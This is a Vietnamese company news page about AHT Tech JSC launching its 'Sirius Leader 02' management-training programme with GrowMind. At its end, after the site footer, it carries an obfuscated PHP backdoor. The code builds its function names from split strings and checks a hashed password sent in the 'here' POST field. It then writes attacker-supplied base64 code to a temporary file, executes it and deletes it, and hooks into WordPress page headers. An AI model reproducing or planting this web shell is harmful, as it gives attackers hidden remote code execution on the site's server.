TRIỂN KHAI CHƯƠNG TRÌNH “SIRIUS LEADER 02” DÀNH CHO TEAM LEADER TẠI AHT JSC

Tiếp nối sự thành công từ chương trình “Sirius Leader 01”, 16 Quản lý/ Lãnh đạo tại AHT TECH JSC đã mạnh mẽ chinh phục hành trình “Nâng cao năng lực Quản lý”. Nhận thấy sự thay đổi tích cực của các Quản lý sau chương trình, Ban Lãnh Đạo AHT tiếp tục tổ chức chương trình “Sirius Leader 02” với sự đồng hành của GrowMind, nhưng lần này, chương trình đã được “thay da đổi thịt” với những điểm mới lạ hơn:

nang cao nang luc quan ly

AHT chủ động triển khai chương trình Sirius Leader 02 dưới sự hướng dẫn, chuyển giao từ GrowMind. Đây là một bước tiến lớn giúp AHT chủ động về nguồn lực, thời gian, chi phí và tiến nhanh hơn đến mục tiêu “Nâng cao năng lực cho toàn bộ đội ngũ Quản lý/Lãnh đạo tại AHT”.

Đội ngũ Facilitators của AHT được trang bị đầy đủ năng lực trước khi bước vào hành trình chủ động đó qua khóa học “Kỹ năng dẫn giảng cho người không chuyên”. Khóa học được thiết kế với nội dung đào tạo thực chiến, có tính ứng dụng cao và đề cao thực hành sau mỗi nội dung học.

Chúc hành trình mới của các Quản lý/Lãnh đạo AHT trong khóa học Sirius Leader 02 sẽ có nhiều trải nghiệm học tập thú vị và bổ ích.

Các chương trình GrowMind đồng hành cùng AHT Tech JSC

  • Chương trình Phát triển năng lực lãnh đạo đầu tiên – SIRIUS LEADER 01
  • Chương trình “Chuẩn CODE”
  • Chương trình Công dân toàn cầu – Global Citizen
  • Chương trình Tech Lead Newbie 01

———–

GrowMind – Đồng kiến tạo các công ty tiến bộ và hạnh phúc!

Theo dõi thêm các hoạt động từ GrowMind tại đây!

1
Bạn cần hỗ trợ?
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}